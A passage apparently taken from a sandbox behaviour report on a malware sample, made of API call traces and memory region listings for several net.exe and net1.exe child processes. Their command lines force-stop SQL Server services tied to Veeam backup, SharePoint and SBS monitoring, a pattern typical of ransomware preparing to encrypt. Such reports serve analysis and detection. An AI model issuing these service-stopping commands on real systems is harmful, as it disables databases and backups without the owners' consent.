_String2="MSSQL$VEEAMSQL2008R2") returned 6 [0104.892] _wcsicmp (_String1="srv", _String2="MSSQL$VEEAMSQL2008R2") returned 6 [0104.892] _wcsicmp (_String1="lanmanserver", _String2="MSSQL$VEEAMSQL2008R2") returned -1 [0104.892] _wcsicmp (_String1="alerter", _String2="MSSQL$VEEAMSQL2008R2") returned -12 [0104.892] _wcsicmp (_String1="netlogon", _String2="MSSQL$VEEAMSQL2008R2") returned 1 [0104.892] NetServiceControl (in: servername=0x0, service="MSSQL$VEEAMSQL2008R2", opcode=0x0, arg=0x0, bufptr=0x16f8b0 | out: bufptr=0x16f8b0) returned 0x889 [0104.893] wcscpy_s (in: _Destination=0xff8a80d0, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0104.893] LoadLibraryW (lpLibFileName="NETMSG") returned 0x75290000 [0104.894] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x75290000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xff8a5b50, nSize=0x800, Arguments=0xff8a7f90 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0104.896] GetFileType (hFile=0xb) returned 0x2 [0104.896] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x16f778 | out: lpMode=0x16f778) returned 1 [0104.896] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff8a5b50*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x16f770, lpReserved=0x0 | out: lpBuffer=0xff8a5b50*, lpNumberOfCharsWritten=0x16f770*=0x1e) returned 1 [0104.897] GetFileType (hFile=0xb) returned 0x2 [0104.897] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x16f778 | out: lpMode=0x16f778) returned 1 [0104.897] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff881efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x16f770, lpReserved=0x0 | out: lpBuffer=0xff881efc*, lpNumberOfCharsWritten=0x16f770*=0x2) returned 1 [0104.897] _ultow (in: _Dest=0x889, _Radix=1505248 | out: _Dest=0x889) returned="2185" [0104.897] FormatMessageW (in: dwFlags=0x2800, lpSource=0x75290000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xff8a5b50, nSize=0x800, Arguments=0xff8a7f90 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0104.898] GetFileType (hFile=0xb) returned 0x2 [0104.898] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x16f778 | out: lpMode=0x16f778) returned 1 [0104.898] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff8a5b50*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0x16f770, lpReserved=0x0 | out: lpBuffer=0xff8a5b50*, lpNumberOfCharsWritten=0x16f770*=0x34) returned 1 [0104.898] GetFileType (hFile=0xb) returned 0x2 [0104.899] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x16f778 | out: lpMode=0x16f778) returned 1 [0104.899] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff881efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x16f770, lpReserved=0x0 | out: lpBuffer=0xff881efc*, lpNumberOfCharsWritten=0x16f770*=0x2) returned 1 [0104.899] NetApiBufferFree (Buffer=0x294d60) returned 0x0 [0104.899] NetApiBufferFree (Buffer=0x29c130) returned 0x0 [0104.899] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSSQL$VEEAMSQL2008R2 /y" [0104.899] exit (_Code=2) Process: id = "203" image_name = "net.exe" filename = "c:\\windows\\system32\\net.exe" page_root = "0x5a865000" os_pid = "0xd08" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\net.exe\" stop MSSQLFDLauncher$SBSMONITORING /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 8124 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 8125 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 8126 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 8127 start_va = 0x210000 end_va = 0x28ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 8128 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 8129 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 8130 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 8131 start_va = 0xff5a0000 end_va = 0xff5bbfff entry_point = 0xff5a0000 region_type = mapped_file name = "net.exe" filename = "\\Windows\\System32\\net.exe" (normalized: "c:\\windows\\system32\\net.exe") Region: id = 8132 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 8133 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 8134 start_va = 0x7fffffdd000 end_va = 0x7fffffddfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdd000" filename = "" Region: id = 8135 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 8136 start_va = 0x410000 end_va = 0x50ffff entry_point = 0x0 region_type = private name = "private_0x0000000000410000" filename = "" Region: id = 8137 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 8138 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 8210 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 8211 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 8212 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 8213 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 8214 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 8215 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 8216 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 8217 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 8218 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 8219 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 8220 start_va = 0x7fefb6e0000 end_va = 0x7fefb6f1fff entry_point = 0x7fefb6e0000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 8221 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 8222 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 8223 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 8224 start_va = 0x7fefaaa0000 end_va = 0x7fefaab7fff entry_point = 0x7fefaaa0000 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\System32\\mpr.dll" (normalized: "c:\\windows\\system32\\mpr.dll") Region: id = 8225 start_va = 0x7fefaf50000 end_va = 0x7fefaf5afff entry_point = 0x7fefaf50000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 8226 start_va = 0x7fefaf60000 end_va = 0x7fefaf86fff entry_point = 0x7fefaf60000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 8227 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Thread: id = 654 os_tid = 0xc20 Process: id = "204" image_name = "net.exe" filename = "c:\\windows\\system32\\net.exe" page_root = "0x5bd85000" os_pid = "0x8ec" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\net.exe\" stop MSSQLFDLauncher$SHAREPOINT /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 8141 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 8142 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 8143 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 8144 start_va = 0x50000 end_va = 0xcffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 8145 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 8146 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 8147 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 8148 start_va = 0xff5a0000 end_va = 0xff5bbfff entry_point = 0xff5a0000 region_type = mapped_file name = "net.exe" filename = "\\Windows\\System32\\net.exe" (normalized: "c:\\windows\\system32\\net.exe") Region: id = 8149 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 8150 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 8151 start_va = 0x7fffffdd000 end_va = 0x7fffffddfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdd000" filename = "" Region: id = 8152 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 8153 start_va = 0x1c0000 end_va = 0x2bffff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 8154 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 8155 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Thread: id = 656 os_tid = 0xb84 Process: id = "205" image_name = "net1.exe" filename = "c:\\windows\\system32\\net1.exe" page_root = "0x5be23000" os_pid = "0xc14" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "198" os_parent_pid = "0x1368" cmd_line = "C:\\Windows\\system32\\net1 stop MSSQL$VEEAMSQL2012 /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 8156 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 8157 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 8158 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 8159 start_va = 0xf0000 end_va = 0x16ffff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 8160 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 8161 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 8162 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 8163 start_va = 0xff390000 end_va = 0xff3c2fff entry_point = 0xff390000 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\System32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe") Region: id = 8164 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 8165 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 8166 start_va = 0x7fffffd9000 end_va = 0x7fffffd9fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd9000" filename = "" Region: id = 8167 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 8168 start_va = 0x300000 end_va = 0x3fffff entry_point = 0x0 region_type = private name = "private_0x0000000000300000" filename = "" Region: id = 8169 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 8170 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 8171 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 8172 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 8173 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 8174 start_va = 0x1b0000 end_va = 0x1bffff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 8175 start_va = 0x1c0000 end_va = 0x2bffff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 8176 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 8177 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 8178 start_va = 0x7fef7330000 end_va = 0x7fef7356fff entry_point = 0x7fef7330000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 8179 start_va = 0x7fefb050000 end_va = 0x7fefb05bfff entry_point = 0x7fefb050000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 8180 start_va = 0x7fefb6e0000 end_va = 0x7fefb6f1fff entry_point = 0x7fefb6e0000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 8181 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 8182 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 8183 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 8184 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 8185 start_va = 0x7fefc0a0000 end_va = 0x7fefc0bcfff entry_point = 0x7fefc0a0000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 8186 start_va = 0x7fefcca0000 end_va = 0x7fefcccffff entry_point = 0x7fefcca0000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 8187 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 8188 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 8189 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 8190 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 8191 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 8192 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 8193 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 8209 start_va = 0x75280000 end_va = 0x75281fff entry_point = 0x75280000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Thread: id = 658 os_tid = 0xc50 [0105.148] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x16fa50 | out: lpSystemTimeAsFileTime=0x16fa50*(dwLowDateTime=0xf3d374b0, dwHighDateTime=0x1d48689)) [0105.148] GetCurrentProcessId () returned 0xc14 [0105.148] GetCurrentThreadId () returned 0xc50 [0105.148] GetTickCount () returned 0x24088 [0105.148] QueryPerformanceCounter (in: lpPerformanceCount=0x16fa58 | out: lpPerformanceCount=0x16fa58*=1815206600000) returned 1 [0105.150] GetModuleHandleW (lpModuleName=0x0) returned 0xff390000 [0105.150] __set_app_type (_Type=0x1) [0105.150] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xff3a9c9c) returned 0x0 [0105.150] __getmainargs (in: _Argc=0xff3b4780, _Argv=0xff3b4790, _Env=0xff3b4788, _DoWildCard=0, _StartInfo=0xff3b479c | out: _Argc=0xff3b4780, _Argv=0xff3b4790, _Env=0xff3b4788) returned 0 [0105.150] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0105.150] GetConsoleOutputCP () returned 0x1b5 [0105.150] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xff3bcec0 | out: lpCPInfo=0xff3bcec0) returned 1 [0105.151] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0105.153] sprintf_s (in: _DstBuf=0x16f9f8, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0105.153] setlocale (category=0, locale=".437") returned="English_United States.437" [0105.154] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0105.154] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0105.154] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSSQL$VEEAMSQL2012 /y" [0105.154] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x16f790, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe")) returned 0x1c [0105.154] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0105.155] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x16f9e8 | out: Buffer=0x16f9e8*=0x314d60) returned 0x0 [0105.155] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x16f9e8 | out: Buffer=0x16f9e8*=0x31c120) returned 0x0 [0105.155] _fileno (_File=0x7fefdba2a80) returned 0 [0105.155] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0105.155] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0105.155] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0105.155] _wcsicmp (_String1="config", _String2="stop") returned -16 [0105.155] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0105.155] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0105.155] _wcsicmp (_String1="file", _String2="stop") returned -13 [0105.155] _wcsicmp (_String1="files", _String2="stop") returned -13 [0105.155] _wcsicmp (_String1="group", _String2="stop") returned -12 [0105.155] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0105.155] _wcsicmp (_String1="help", _String2="stop") returned -11 [0105.155] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0105.155] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0105.155] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0105.155] _wcsicmp (_String1="session", _String2="stop") returned -15 [0105.155] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0105.155] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0105.155] _wcsicmp (_String1="share", _String2="stop") returned -12 [0105.155] _wcsicmp (_String1="start", _String2="stop") returned -14 [0105.155] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0105.155] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0105.155] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0105.156] _wcsicmp (_String1="accounts", _String2="MSSQL$VEEAMSQL2012") returned -12 [0105.156] _wcsicmp (_String1="computer", _String2="MSSQL$VEEAMSQL2012") returned -10 [0105.156] _wcsicmp (_String1="config", _String2="MSSQL$VEEAMSQL2012") returned -10 [0105.156] _wcsicmp (_String1="continue", _String2="MSSQL$VEEAMSQL2012") returned -10 [0105.156] _wcsicmp (_String1="cont", _String2="MSSQL$VEEAMSQL2012") returned -10 [0105.156] _wcsicmp (_String1="file", _String2="MSSQL$VEEAMSQL2012") returned -7 [0105.156] _wcsicmp (_String1="files", _String2="MSSQL$VEEAMSQL2012") returned -7 [0105.156] _wcsicmp (_String1="group", _String2="MSSQL$VEEAMSQL2012") returned -6 [0105.156] _wcsicmp (_String1="groups", _String2="MSSQL$VEEAMSQL2012") returned -6 [0105.156] _wcsicmp (_String1="help", _String2="MSSQL$VEEAMSQL2012") returned -5 [0105.156] _wcsicmp (_String1="helpmsg", _String2="MSSQL$VEEAMSQL2012") returned -5 [0105.156] _wcsicmp (_String1="localgroup", _String2="MSSQL$VEEAMSQL2012") returned -1 [0105.156] _wcsicmp (_String1="pause", _String2="MSSQL$VEEAMSQL2012") returned 3 [0105.156] _wcsicmp (_String1="session", _String2="MSSQL$VEEAMSQL2012") returned 6 [0105.156] _wcsicmp (_String1="sessions", _String2="MSSQL$VEEAMSQL2012") returned 6 [0105.156] _wcsicmp (_String1="sess", _String2="MSSQL$VEEAMSQL2012") returned 6 [0105.156] _wcsicmp (_String1="share", _String2="MSSQL$VEEAMSQL2012") returned 6 [0105.156] _wcsicmp (_String1="start", _String2="MSSQL$VEEAMSQL2012") returned 6 [0105.156] _wcsicmp (_String1="stats", _String2="MSSQL$VEEAMSQL2012") returned 6 [0105.156] _wcsicmp (_String1="statistics", _String2="MSSQL$VEEAMSQL2012") returned 6 [0105.156] _wcsicmp (_String1="stop", _String2="MSSQL$VEEAMSQL2012") returned 6 [0105.156] _wcsicmp (_String1="time", _String2="MSSQL$VEEAMSQL2012") returned 7 [0105.156] _wcsicmp (_String1="user", _String2="MSSQL$VEEAMSQL2012") returned 8 [0105.156] _wcsicmp (_String1="users", _String2="MSSQL$VEEAMSQL2012") returned 8 [0105.156] _wcsicmp (_String1="msg", _String2="MSSQL$VEEAMSQL2012") returned -12 [0105.156] _wcsicmp (_String1="messenger", 